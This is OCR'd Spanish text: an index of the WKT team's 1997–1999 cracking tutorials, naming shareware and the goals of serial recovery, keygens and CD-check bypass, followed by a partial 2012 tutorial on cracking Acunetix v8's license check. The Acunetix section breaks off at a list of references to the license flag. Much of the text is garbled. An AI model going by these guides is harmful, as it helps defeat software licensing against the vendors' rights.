Octubre de 1999 nuMIT_or [W32DASM32 8.93 y/o IDA PRO, 
EXeScope v4.40, Softlce (opcional) 


La Memoria en W32: Intro (W95/W98/NT) 


Suministrar conocimiento que permita comprender cómo W32 
traduce direcciones virtuales en direcciones físicas. 


Editor hexadecimal, ProcDump v1.5, 
Octubre de 1999 nuMIT_or [W32DASM32 8.93 y/o IDA PRO, 
EXeScope v4.40 (opcional), Softlce 


Reversing with ToPo v1.0 (W95/W98/NT) 


¡Cómo usar ToPo v1.0 


| : Topo v1.0, Uedit y (opcionalmente) 
23/10/99 Mr.Crimson SoftICE 


[Lake Clear Animato v1.0c (W95/W98/NT) 
¡Obtención de un número de Serie Válido y creación de KeyMaker 
y 1/10/99 Mr.Green  ¡Softlce v3.24 


[Cuentapasos v3.75 (W95/W98/NT) 
¡Simular estar registrados. 
118/ 10/99 Mr.Blue Softlce v4.0, SmartCheck 6.0, Spy++ 


Productos RKS Software (W95) 


Obtención de un número de Serie Válido y creación de KeyMaker 


| 18/10/99 Mr.Green Softlce v3.24 


Winboost 2000 v1.0.0.1999 (W95/W98/NT) 


Obtener un número de Serie Válido 


: ProcDump v1.5, Gettyp v2.38, 
Ú ae Mr.WhiTe  v32d4asm v8.93, UltraEdit v6.10a 


Kyodai v10.21 (W95/W98/NT) 


Obtener un número de Serie Válido 


17/10/99 Mr.WhiTe 


Quick Heal v5.20 (W95/W98/NT) 


ProcDump v1.50, Gettyp for Dos 
v2.35, Softlce v3.24, W32dasm 
v8.93, UltraEdit v6.10a 


Simular estar registrados. 


| 13/10/99 Kolgado Softlce v4.01 


Wi 


¡Septiembre 1999 


[Ultraedit v6.20b (W95) 
¡Simular estar registrado. 
(29/09/99 “DeeJ ay? ¡SoftIce v3.24, W32dasm v8.9 


[Ulead Media Studio Pro v5.01 (W95) 


Conseguir que no caduque el programa, NagScreen y eliminar una X 
muy molesta. 

. Softlce v3.25, Referencia 
210959 Estados Porcino API32 


[Ulead Video Studio v3.0 (W95) 

Conseguir que no caduque el programa, NagScreen y otras 
limitaciones 

14/09/99 ¡Mr.Orange [WkT!] ¡SoftIce v3.25 


[TogglePopDesk v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


07/09/99 [Mr.WhiTe W32dasm v8.93, UltraEdit 
v6.10a 


[TogglePing+ v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


07/09/99 [Mr.WhiTe W32dasm v8.93, UltraEdit 
v6.10a 


[ActiveLock 1.5 y VBCodeLibrary 3.0.0 (W95) 
¡Conseguir la clave para registrarse. 


03/09/99 ¡Paco Visual Basic 5+, Smartcheck 6 
(opcional) 


Agosto 1999 


[Ulead Button.Applet 1.0 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 
(31/08/99 [Mr.Orange ¡SoftIce v3.25, ProcDump 


[Descompresión manual con ProcDump (W95) 
¡Como usar el ProcDump para descomprimir/desencriptar tus cobayas. 
3 1/08/99 Mr.Orange ¡Softlce v3.25, ProcDump 


[English-Spanish Interpreter 2000 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 
(25/08/99 ¡Mr.Crimson ¡SoftIce v3.25, TechFacts 95 


Toggle Mouse v3.4.3 (W95/W98/NT) 


Cracking: Primeros pasos. Conocimientos básicos de ensamblador. El 
registro de Windows. 


¡Simular estar registrados. 


| 25/08/99 Mania PC o v8.9, UltraEdit v6.10a, Registry 
Monitor 


[Particle Fire screensaver v1.1a (W95) 
¡Conseguir la clave para registrarse. 


. Softlce v4.00, Regmon, Hiew 6.04 
1910899 Champion | (mASM32 opcional) 
[Advanced Video Poker v1.1 (W95) 


[Buscar el número de serie y crear su Key-Generator 
14/08/99 ¡Mr.GReeN ¡Smartcheck v6.01 (Build 952) 


> 
WIN 


¡Julio 1999 


[Ulead PhotolImpact v4.2 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 


so 107/99 Mew E v3.25, W32dasm v8.9, UltraEdit 


[Lotus SmartSuite Millenium Edition (W95) 
Conseguir que no caduque el programa y NagScreen. 


1 3/07/99 MrviiTe e v3.25, W32dasm v8.9, UltraEdit 


[Ultraedit v6.10a (W95) 
¡Simular estar registrado. 
[15/07/99 [Mr.WhiTe ¡Softlce v3.24, W32dasm v8.9, UltraEdit v5.0a 


[WinGest v3.5 (W95/W98/NT) 
¡Obtención de un número de Serie Válido 
[07/07/99 [XASX ¡Softlce v3.25 


J unio 1999 


[NEED FOR SPEED 3 (W95) 
[Evitar el Cd-Check. 


07/06/99 Mr.WhiTe W32Dasm v8.9, Editor 
Hexadecimal 


[Crackeando en VB [Esiel2 r unio de 1999 


Este tutorial contiene lo basico a mi entender que debes saber de 
herramientas y de algunas funciones que tanto le gusta llamar al 
Visual Basic. 


Exploit Submission Wizard 5 (W95) 


¡Conseguir la clave para registrarse. 


10 1/06/99 [Esiel2 ¡Softlce v3.24 | 


¡Mayo 1999 


[Talisman v1.1 (W95) 
¡Conseguir la clave para registrarse. 
11/05/99 [Mr.WhiTe ¡SoftIce 3.24 


[CuentaPasos v3.72 (W95) 
¡Conseguir que no caduque nunca el programa. 


02/05/99 [Esiel2 Softlce 3.22, Tasm 5.0, Process Patcher v 2.4 
(opcional). 


¡Marzo 1999 


[File Compare Utility 3.0.002 (W95) 
[Hacer un Generador de claves (KeyGen). 
101/03/99 ¡Mr.Brown ¡Softlce 3.22, JavaScript 


Win 


[Enero 1999 


[Picture Explorer 1.21 (W95) 
[Conseguir la clave para registrarse. 
(09/01/99 Mr.Grey ¡Wdasm 


[KAWA 3.13 (W95) 
¡Conseguir la clave para registrarse. 
(09/01/99 Mr.Grey ¡Softlce 3.24 


Java Script It ! v1.3 (W95) 


¡Conseguir la clave para registrarse. 
107/01/99 Esiel2 ¡SoftIce v3.24 


[Diciembre 1998 


[Cover Your Tracks 3.1 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 [Mr.Grey ¡Softlce 3.24 


[AddSoft 2.26 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 'Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


¡Noviembre 1998 


Uninstall Manager 2.60 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 11/98 Mr.Grey ¡Softlce 3.24 


[PhotoLine 4.53 (W95) 
¡Conseguir que no caduque el programa. 
(20/ 11/98 Mr.Grey ¡SoftIce 3.24, Hex Workshop 2.54 


[Multimedia Builder 3.0 (W95) 
¡Observación de los colores para crackear ;-) 
¡Noviembre 98 Mr.Pink ¡Softlce 


[CaseLinr 5.4 (W95) 
¡Conseguir la clave para registrarse. 
108/ 11/98 Mr.Grey ¡SoftIce 3.24 


[Cabinet Manager 98 2.0 (W95) 
¡Conseguir que no caduque nunca el programa. 
108/ 11/98 Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


¡Octubre 1998 


[Screens 1.27 (W95) 
Conseguir la clave para registrarse. 
[25/ 10/98 [Mr.Grey Softlce 3.24 


[AxMan 2.21 (W95) 
¡Conseguir la clave para registrarse. 
[25/ 10/98 [Mr.Grey Softlce 3.24 


[Revival 2.1 (W95) 
[Explicación para hacer un Generador de Llaves. 
¡Octubre 98 [Mr Pink Softlce, IDA Pro 3.75, Compilador de C 


[A-X.E. 2.0) (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey Softlce 3.24 


[DI Show 3.7 (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey Softlce 3.24 


¡Septiembre 1998 


¡Slim Show 3.1 (W95) 
¡Quitar las limitaciones de la versión Shareware. 
(29/9/98 [Mr.Pink ¡SoftIce 3.22, IDA Pro 3.75, Editor Hexadecimal 


Commandos Behind the Enemy Lines (W95) 


[Evitar el Cd-Check. 
15/9/98 [Mr.Brown ¡Softlce 3.22, IDA Pro 3.75, Editor Hexadecimal 


a. 
WEN 


¡Agosto 1998 


[CdrLabel 4.1 (W95) 
¡Simular estar registrado. 
15/8/98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


¡SemPoint 2.25 (W95) 
¡Simular estar registrado. 
13/8/98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


Font Look 3.2, Directory Printer 1.8, Super Text Search 1.6 
E ) 


¡Conseguir la clave para registrarse. 


[5/8/98 [Mr.Brown ¡Softlce 3.22 


¡Julio 1998 


[Internet Organizer 3.1 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡Wdasm 8.9 


[Hex WorkShop 2.51 (W95) 
¡Saltarse el registro. 
y ulio 98 [Daniel ¡Wdasm, Editor Hexadecimal 


[Quick View plus 4.0 (W95) 
¡Saltarse el registro. 
y ulio 98 [Daniel ¡Wdasm, Editor Hexadecimal 


¡Submission Wizard 4 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡SoftIce 3.22 


[WinRAR 2.04 (W95) 
¡Simular estar registrado. 
y ulio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[TextPad 3.2.4 (W95) 
¡Saltarse el aviso inicial de shareware 
y ulio 98 [Mr.Brown ¡Wdasm 8.9, Editor Hexadecimal 


[Html Validator v2.55 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡SoftIce HL 


[Backgammon Pro (W95) 
¡Quitar límite de partidas para la versión shareware 
y ulio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[Logical (DOS) 
[Evitar la pantalla inicial de introducción de password. 
J ulio 98 [Mr.Brown ¡Softice 3.22, Editor Hexadecimal 


WEA 
[Antes de Julio 1998 
[Norton CrashGuard Deluxe 3.0 (W95) 
Conseguir la clave para registrarse. Protección Cinderella, "Turnkey 
Popper" basada en la librería RSAGNT32.DLL 
[Mayo 98 [Estado+Porcino Wdasm 8.X , Softlce 


[Uedit 5.0 (W95) 
¡Conseguir la clave para registrarse. 
[Enero 98 [Estado+Porcino Wdasm 8.X , Softlce 


[MatLab 5 (W95) 
¡Estudio y desprotección de la mochila. 


. Softlce 3.2, Wdasm 8.X, 
Enero dd año Editor Hexadecimal 
[TechFacts 95 (W95) 
¡Simular estar registrado. 


Diciembre 97 Estado+Porcino pOMleS as Eon 
Hexadecimal 


Wi 
[ Plantilla en formato htm | Plantilla en 
formato zip ] 


> 
Wi 


| [ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


[ActiveLock 1.5 y VBCodeLibrary 3.0.0 (W95) 
¡Conseguir la clave para registrarse. 
103/09/99 [Paco ¡Visual Basic 5+, Smartcheck 6 (opcional) 


[AddSoft 2.26 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


[Advanced Video Poker v1.1 (W95) 
Buscar el número de serie y crear su Key-Generator 
14/08/99 [Mr.GReeN ¡Smartcheck v6.01 (Build 952) 


[A.X.E. 2.0) (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey ¡Softlce 3.24 


[AxMan 2.21 (W95) 


¡Conseguir la clave para registrarse. 
[25/ 10/98 [Mr.Grey ¡SoftIce 3.24 


[Backgammon Pro (W95) 
¡Quitar límite de partidas para la versión shareware 
Julio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[Cabinet Manager 98 2.0 (W95) 
¡Conseguir que no caduque nunca el programa. 
108/ 11/98 Mr.Grey  |Softlce 3.24, Hex Workshop 2.54 


[CaseLinr 5.4 (W95) 
¡Conseguir la clave para registrarse. 
108/ 11/98 Mr.Grey  |Softlce 3.24 


[CdrLabel 4.1 (W95) 
¡Simular estar registrado. 
[15/ 8/98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


Code Snippet Creator v1.05: (W95/W98/NT) 

Descabezando archivos ejecutables portables 

Comprender la estructura y el contenido del encabezado de los 
archivos con formato PE 


Editor hexadecimal, ProcDump v1.5, 
Octubre de 1999 ¡nuMIT_or ¡W32DA5SM32 8.93 y/o IDA PRO, 
EXeScope v4.40, Softlce (opcional) 


Commandos Behind the Enemy Lines (W95) 


Evitar el Cd-Check. 


15/9/98 Mr.Brown Softlce 3.22, IDA Pro 3.75, Editor 
Hexadecimal 


Cover Your Tracks 3.1 (W95) 


Conseguir la clave para registrarse. 


(20/ 12/98 Mr.Grey  |Softlce 3.24 


Cuentapasos v3.75 (W95/W98/NT) 


¡Simular estar registrados. 
118/ 10/99 Mr.Blue  |Softlce v4.0, SmartCheck 6.0, Spy++ 


[CuentaPasos v3.72 (W95) 
¡Conseguir que no caduque nunca el programa. 


02/05/99 Esiel2 Softlce 3.22, Tasm 5.0, Process Patcher 
v 2.4 (opcional). 


| D 
[Directory Printer 1.8 (W95) 


¡Conseguir la clave para registrarse. 
[5/8/98 Mr.Brown ¡Softlce 322 


[DI Show 3.7 (W95) 
¡Conseguir la clave para registrarse. 
| 18/10/98 Mr.Grey ¡Softlce 3.24 


| E 
[English-Spanish Interpreter 2000 (W95) 


¡Conseguir que no caduque el programa y NagScreen. 
(25/08/99 [Mr.Crimson ¡Softlce v3.25, TechFacts 95 


[Exploit Submission Wizard 5 (W95) 
Conseguir la clave para registrarse. 
101/06/99 [Esiel2 ¡SoftIce v3.24 


| F 
[File Compare Utility 3.0.002 (W95) 


[Hacer un Generador de claves (KeyGen). 
101/03/99 [Mr.Brown ¡Softlce 3.22, JavaScript 


[Font Look 3.2 (W95) 
¡Conseguir la clave para registrarse. 
15/8/98 [Mr Brown ¡Softlce Ed 


| H 
[Hex WorkShop 2.51 (W95) 


¡Saltarse el registro. 
y ulio 98 [Daniel Wdasm, Editor Hexadecimal 


[Html Validator v2.55 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown Softlce 3.22 


| I 
[Internet Organizer 3.1 (W95) 


¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡Wdasm 8.9 


o 


Java Script It ! v1.3 (W95) 
¡Conseguir la clave para registrarse. 
107/01/99 Esiel2 ¡Softlce v3.24 


Kyodai v10.21 (W95/W98/NT) 


Obtener un número de Serie Válido 


ProcDump v1.50, Gettyp for Dos v2.35, 
17/10/99 ¡Mr.WhiTe ¡Softlce v3.24, W32dasm v8.93, UltraEdit 
v6.10a 


KAWA 3.13 (W95) 


Conseguir la clave para registrarse. 


109/01/99 [Mr.Grey ¡Softlce 3.24 


L 


Lake Clear Animato v1.0c (W95/W98/NT) 


¡Obtención de un número de Serie Válido y creación de KeyMaker 
(21/10/99 [Mr.Green ¡Softlce v3.24 


[Logical (DOS) 
[Evitar la pantalla inicial de introducción de password. 
Julio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[Lotus SmartSuite Millenium Edition (W95) 
¡Conseguir que no caduque el programa y NagScreen. 


15/07/99 [Mr.WhiTe Softlce v3.25, W32dasm v8.9, UltraEdit 
v6.10a 
WEA 


| M 
[MatLab 5 (W95) 
¡Estudio y desprotección de la mochila. 


Enero 98 o Softlce 32, Wdasm 8.X, Editor 
Hexadecimal 
[Multimedia Builder 3.0 (W95) 


¡Observación de los colores para crackear ;-) 
¡Noviembre 98 |[Mr.Pink ¡Softlce 


[NEED FOR SPEED 3 (W95) 
[Evitar el Cd-Check. 


07/06/99 Mere Me aAenor 
Hexadecimal 

[Norton CrashGuard Deluxe 3.0 (W95) 

Conseguir la clave para registrarse. Protección Cinderella, "Turnkey 

Popper” basada en la librería RSAGNT32.DLL 


[Mayo 98 Estado+Porcino |'Wdasm 8.X , Softlce 


A 


[Particle Fire screensaver v1.la (W95) 
¡Conseguir la clave para registrarse. 


19/08/99 [Champion Softlce v4.00, Regmon, Hiew 6.04 (mASM32 
opcional) 


[Picture Explorer 1.21 (W95) 
¡Conseguir la clave para registrarse. 
109/01/99 [Mr.Grey ¡Wdasm 


[PhotoLine 4.53 (W95) 
¡Conseguir que no caduque el programa. 
(20/ 11/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


| Q 
[Quick Heal v5.20 (W95/W98/NT) 


¡Simular estar registrados. 
| 13/10/99 Kolgado ¡Softlce v4.01 


[QuickView plus 4.0 (W95) 
¡Saltarse el registro. 
J ulio 98 Daniel ¡Wdasm, Editor Hexadecimal 


| R 
[Registry Studio V1.01 (W95/W98/NT) 
¡Simular estar registrados. 


Softlce v4, W32dasm v8.9, Heditor HEX (A 
so 10/99 Kamor S Gusto) 


[Revival 2.1 (W95) 
[Explicación para hacer un Generador de Llaves. 
¡Octubre 98 [Mr Pink [Softice, IDA Pro 3.75, Compilador de C 


[Productos RKS Software (W95) 
[Obtención de un número de Serie Válido y creación de KeyMaker 
18/10/99 [Mr.Green ¡Softlce v3.24 


| S 
¡SemPoint 2.25 (W95) 


¡Simular estar registrado. 
13/8/98 ¡Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


¡Slim Show 3.1 (W95) 
¡Quitar las limitaciones de la versión Shareware. 
(29/9/98 [Mr Pink ¡Softlce 3.22, IDA Pro 3.75, Editor Hexadecimal 


[Submission Wizard 4 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 ¡Mr.Brown ¡SoftIce 3,22 


[Super Text Search 1.6 (W95) 
¡Conseguir la clave para registrarse. 
[5/8/98 [Mr.Brown ¡Softlce 3,22 


Toggle Mouse v3.4.3 (W95/W98/NT) 
Cracking: Primeros pasos. Conocimientos básicos de ensamblador. El 
registro de Windows. 


¡Simular estar registrados. 


| | , a v8.9, UltraEdit 
cd Manto ee v6.10a, Registry Monitor 


[TogglePopDesk v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


07/09/99 Mr.WhiTe W32dasm v8.93, UltraEdit 
v6.10a 


[TogglePing+ v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


07/09/99 Mr.WhiTe W32dasm v8.93, UltraEdit 
v6.10a 


[Talisman v1.1 (W95) 
¡Conseguir la clave para registrarse. 
11/05/99 [Mr.WhiTe ¡Softlce 3.24 


[TechFacts 95 (W95) 
¡Simular estar registrado. 
[Diciembre 97 [Estado+Porcino ¡Softlce 3.0, Editor Hexadecimal 


[TextPad 3.2.4 (W95) 
¡Saltarse el aviso inicial de shareware 
Julio 98 [Mr.Brown ¡Wdasm 8.9, Editor Hexadecimal 


ME 


| U 
[Ulead Button.Applet 1.0 (W95) 


¡Conseguir que no caduque el programa y NagScreen. 
(31/08/99 Mr.Orange ¡Softlce v3.25, ProcDump 


[Ulead Media Studio Pro v5.01 (W95) 

Conseguir que no caduque el programa, NagScreen y eliminar una X 
muy molesta. 

(21/09/99 Estado+Porcino ¡Softlce v3.25, Referencia API32 


[Ulead Photolmpact v4.2 (W95) 
[Conseguir que no caduque el programa y NagScreen. 


. Softlce v3.25, W32dasm v8.9, 
2010799 Mr.WhiTe e dit v6.10a 
[Ulead Video Studio v3.0 (W95) 
Conseguir que no caduque el programa, NagScreen y otras 
limitaciones 
14/09/99 Mr.Orange [WkT!] ¡Softlce v3.25 


[Ultraedit v6.20b (W95) 
¡Simular estar registrado. 
(29/09/99 ADeeJay? ¡Softlce v3.24, W32dasm v8.9 


[Ultraedit v6.10a (W95) 
¡Simular estar registrado. 


. Softlce v3.24, W32dasm v8.9, 
150799 Mr.WhiTe e dit vs .0a 


[Ultraedit 5.0 (W95) 
¡Conseguir la clave para registrarse. 
[Enero 98  ¡Estado+Porcino ¡Wdasm 8.X , Softlce 


[Uninstall Manager 2.60 (W95) 


¡Conseguir la clave para registrarse. 
(20/ 11/98  |¡Mr.Grey ¡SoftIce 3.24 


[Winboost 2000 v1.0.0.1999 (W95/W98/NT) 
¡Obtener un número de Serie Válido 


a ProcDump v1.5, Gettyp v2.38, W32dasm 
Ú Ei MrwarTe dE UltraEdit v6.10a 
[WinGest v3.5 (W95/W98/NT) 


¡Obtención de un número de Serie Válido 
107/07/99 [XASX ¡Softlce v3.25 


[WinRAR 2.04 (W95) 
¡Simular estar registrado. 
Julio 98 ¡Mr.Brown ¡SoftIce 3.22, Editor Hexadecimal 


| 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 


[AScreens 1.27 (W95) 
¡Conseguir la clave para registrarse. 
[251 10/98 Mr.Grey ¡Softlce 3.24 


[ Plantilla en formato htm | Plantilla en 
formato zip ] 


ME 


| [ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 
[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


CRACKEANDO ACUNETIX V3 - 2012 


26 de noviembre del 2012 
VICTIMA Acunetix v8 2012 


URL DESCARGA http://www .acunetix.com/download/full 
ver8/2012 11 13 01 webvulnscan8.exe 


PROTECCION Serial name 
OBJETIVO Registrar el software 


DIFICULTAD MEDIA-AVANZADA 


CRACKER ALEJANDRO TORRES (TORRESCRACK) 


dG http://www .facebook.com/vo.torrescrack 


www.torrescrack.blogspot.com 


INTRODUCCION: 


Este tutorial es unicamente con fines educativos y no 
me hago responsable por lo que se haga con su 
contenido. 


Bien , este tutorial lo hice ya que no existe algun tute en la 
red de como atacar este software , y ademas de esto, resulta 
que yo estaba buscando por la web algun escaneador de 
vulnerabilidades web reciente y bueno , lei en muchos sitios 
que este software acunetix es uno de los mejores pero el 
problema es que yo queria probarlo y en la pagina tienen solo 
una version free que no escanea completamente como 
deberia y la otra version completa tiene un costo , en la red 
hay un crack o parche pero no me anime a bajarlo , asi que 
me puse a darle un vistazo para obtener mi propia version 
liberada y demostrar que este software especializado en 
buscar vulnerabilidades web es muy vulnerable. 


EXPLORANDO AL ENEMIGO: 


Primero Instalamos y se me ocurrio correr el software para 
ver que tipo de proteccion o limitacion utilizaba , veamos. 


3 Acunetix Web Vulnerability Scanner - Web Activation 


Activation Activation 


Connection You need to activate your copy of Acunetix Web Vulnerability Scanner. 
a ' Internet connection is required for web activation. 
summary 


Activation details 


Please enter the license key and contact information below: 


License Key: sy] 
Name: A 
Company: o 
Email: A 
Telephone: A 


Country: Afghanistan ba 


acunetix 


Uhmm vemos que antes de iniciar el soft me pide datos de la 
licencia para activar online y si no ingresas nada o algo 
erroneo no entras al soft , aparte de caro $$ ni siquiera te 
dejan probar el software por unos dias en su version completa 
, vayamos a la carpeta donde se instalo el software para ver 
que mas tiene 


[FA Activation 13/11/2012 03:10 . 
(23) DelZip190.dll 19/01/2012 02:36 . 
[| ffacuscan.xpi 10/04/2012 02:41 . 
[2] libeay32.di! 27/07/2011 11:09 z 
TE] license 14/02/2012 10:46 z 
(E Isr 13/11/2012 03:10, 
[2] pcre.dil 27/07/2011 11:09 a 
di) Reporter 13/11/2012 03:10 . 
E] reporter_console 13/11/2012 03:10, 
[| SciLexer.dIll 27/07/2011 1 

[2] ssleay32.dIl 27/07/20 

| | unins000.dat 25/11/2012 09:40 
5 unins000 25/11/2012 09:39 
2% Uninstall 13/11/2012 03:10. 
[5] ve 13/11/2012 03:10. 
[A] ws 13/11/2012 03:10. 
[a)| wvs 25/11/2012 09:40 , 
n= wvs_console 13/11/2012 03:10 . 
JA WWSScheduler 13/11/2012 03:10, 


Bien no tiene muchas cosas , pero hay se encuentra un 
ejecutable llamado *Activation.exe” que al correrlo nos damos 
cuenta que es la misma pantalla que vimos anteriormente y el 
ejecutable principal es "wvs.exe”. 


Bien , entonces ya sabemos que el programa principal es 
“wvs.exe” entonces empezamos por hay, ya que de alguna 


forma el programa compara si esta registrado o licenciado y 
de lo contrario carga el otro ejecutable para iniciar con el 


registro o activacion. 


Vamos a examinarlo con un escaneador en este caso el 
“Protection 1D” para saber si el programa esta empacado y 


ver en que esta compilado , veamos. 


[| ¿? 155) A PROTECTION ¡D v0.6.41 MARCH 

La|rd 

ra tR <Previous Data Cleared> 

ESAS 

Pa 

ajs 

.—. EX [!] Possible CD/DVD-Key or Serial Check -> evaluation version 

Aa] || andas 

=E | 

o ES Log Filter Y| Smart Scan Scan Files > Size Threshold 
E Status Waiting for file(s) * Folders to scan 


Y | Aggressive Scan 


col. 


Queue 


Bien no usa algun packer/protector , solo detecto un posible 
deteccion de CD KEY o serial check , que en este caso es lo 


segundo. 


Abramos nuestro debugger y empezemos . 


[e] File View Debug Options Window Help 


daa: 


DWORD PTR FS:[EAX 1 
DWORD PTR FS:LEAX 1 


Al iniciar lo primero que se me ocurrio con la info obtenida 
anteriormente fue buscar en las strings el nombre del proceso 
que ejecuta , en este caso “Activation.exe” veamos lo que 
encontramos 


ASCII "User Objects: Ad” 
ASCII "ug" 


ASCII "FastiM4: %d Kb” PR . y AA 
"Debugger detectedt The application will now terninate. Please close the debugger and restart the application. AI 

ASCII "Activation, exe” 

ASCII "Acunetix Ltd.” 

ASCII "Signature error” | 

ASCII "This application has been tampered witht/EThe activation signature doesn't matcht/ElVou may be a victim of softw 

ASCII "Parse settings ...” 

ASCII "Rewrite log files ...” 

ASCII "Init logging ...” 


El software tiene algun metodo antidebug que detecta si esta 
siendo debugeado o si hay algun parche , todavia no sabemos 
como lo hace pero sigamos buscando mas strings haber si 
hay otras llamadas y alrato regresamos :P , colocamos en el 
inicio de esa rutina un BreakPoint y sigamos. . 


ido 01 a E cacas a 


DWORD PTR DS: [AE3D14] 


DWORD PTR FS: 


WORD PTR DS: [A2CA3C1 


DWORD PTR DS: [AE3564] 
DWORD PTR DS: [EAX] 


Seguimos buscando y aqui tenemos algo interesante si ven la 
imagen tenemos la zona mas sopechosa de todas pues aqui 


vemos cuando decide si expira o no si esta activado o no , 
vayamos a esa zona haber que veemos 


SE ” 

"sscanwsdl" 

"recanfromcrawl” 

"acunetixz_root_ca.key” 

"acunet ix_ root_ca. cer” 

"certificate_cache.dat” 

"The Acunet iz rt root certificate was not found. Please 
"ScanQutput . Wu 

p Lo 


a tivatedt” 
"ou etiz WU icense will expire in ” 
" dayst” 
ay Acunet ix wuSs license will expire tomorrowt” 
CII "Activation.exe” 


3947 calls to known, 9143 calls to guessed functions 


DWORD PTR DS: [AE3564] 
DWORD PTR DS: [EAX 1 


DWORD PTR DS: [AE3E38 1] 
DWORD PTR DS:LEAX 1] 
BYTE PTR DS: [EAX+4] 


DWORD PTR DS:[AE35641 
DWORD PTR DS:[EAX 1 


DWORD PTR DS: [AE35641 
DWORD PTR DS: [EAX 1 


Que bien!! , si ven hay arriba tenemos una direccion de 
memoria que dentro de ella se encuentra un buffer y 
compara el contenido de esa direccion con O y si el valor es 
diferente ya no llama al “activation.exe” supongo que al haber 
licencia debe valer 1 el contenido del buffer. 


En mi experiencia en diferentes software comercial he visto 
que utilizan comparaciones en diferentes partes o ubicaciones 
del programa para ver si el soft esta registrado, ocupa las 
mismas direcciones de memoria y hace las mismas 
comparaciones por otras partes del software , pensando que 
es un metodo anti-cracking por si alguien se le ocurre 
parchear unicamente ese salto condicional , o bien tambien en 
algun momento debe meterle contenido a ese buffer ¡veamos 
si mis sospechas son ciertas busquemos si alguien mas usa 
esa direccion de memoria , hagamos click derecho y "find 
references to: address constant” y veamos. 


da am SE E E HEM 


¿ss |Disassembl Comment 

39E4 | MOU EAX, DWORD PTR DS: CAESESS] COBAESESS]=B50AEAT6C 
¡SFE! MOU EAX, DWORD PTR DS: CAESES8] COBAESESS ]=0B0AEAT6c 
3814 | MOU EAX,DWORD PTR DS: CAESES38J [OBAE3E337]=BBAEA76C 
1227 | MOU EAX, DWORD PTR DS: CAE3E=8] [OBAESE33]=B0AEA7T6C 
1232| MOU EAX, DWORD PTR DS: CAESE38J [OBAE3E23]=505BAEATéC 
1779| MOU EAX, DWORD PTR DS: CAESESSI [OBAESE33J]=B0AEA76C 
1BBE| MOU EAX, DWORD PTR DS: CAESE38] [OBAESE33J]=BBAEA76C 
3530 | MOU EAX, DWORD PTR DS: CAESE38J [OBAESE33J]=B0AEA76C 
3567 | MOU EAX, DWORD PTR DS: CAESES8] ota IA 
3C28| MOU EAX, DWORD PTR DS: CAESES38J COBAESE33I]=B0AEA7E! 
3C35| MOU EAX, DWORD PTR DS: CAESES38] ESOnESESS 3=S6REATeC 
¿CSA!| MOU EAX, DWORD PTR DS: CAESE38J [OBAESE33I]I=B0AEA7E! 
3CSE| MOU EAX, DWORD PTR DS: CAESES8] ESOnESESs 3=S6REATeC 
KEC9!| MOU EAX, DWORD PTR DS: CAESE38J COBAESE33I=BB0AEA7E 
1F94| MO0U EAX, DWORD PTR DS: CAESES8] ESOnESESs 3=S6REATeC 
¿LEA | MOU EAX, DWORD PTR DS: CAESE38J [OBAEZSE33]=B0AEA7E 
11F9| MOU EDX, DWORD PTR DS: CAESES8] Wus . BOREATEC 

3229 | MOU EAX, DWORD PTR DS: CAESE38J COBAESE33J]=BB0AEA76C 
3316 | MOU EAX, DWORD PTR DS: CAESES38] E 
3325| MOU EDX, DWORD PTR DS: CAESE38J Wus . DORE! 

3355| MOU EAX, DWORD PTR DS: CAESES8J [S6heSE Ss ¡=SogEnTeC 
FF3| MOU EAX, DWORD PTR DS: [AESE38] al BBAEATE 
1902| MOU EDX, DWORD PTR DS: CAESESSI wus. BORAEATEGC 

1932| MOV EAX, DWORD PTR DS: CAESE38] COBA! Ésese7 =BBAEA7rEC 
1172| MOU EAX, DWORD PTR DS: CAESESSI COBAESE33SJ]=B0AEA76C 
117F|MOU EAX, DWORD PTR DS: CAESE38J] COBAESES3 ]=B0BAEAT6C 
1180! MOU EAX, DWORD PTR DS: CAESE38J C[OBAESE33]I=505AEAré6c 
1491| M0U EAX, DWORD PTR DS: CAESES8] [OBAESESS ]=B0AEAY6C 
JS56F | MOU EAX, DWORD PTR DS: CAESES38J [OBAESE33]=505AEATé6C 
JSED| MOU EAX, DWORD PTR DS: CAESESSI [OBAESES3 ]=B0AEAT6C 
1760! MOU EAX, DWORD PTR DS: CAESE38J COBAESE33]=50B0AEATé6C 
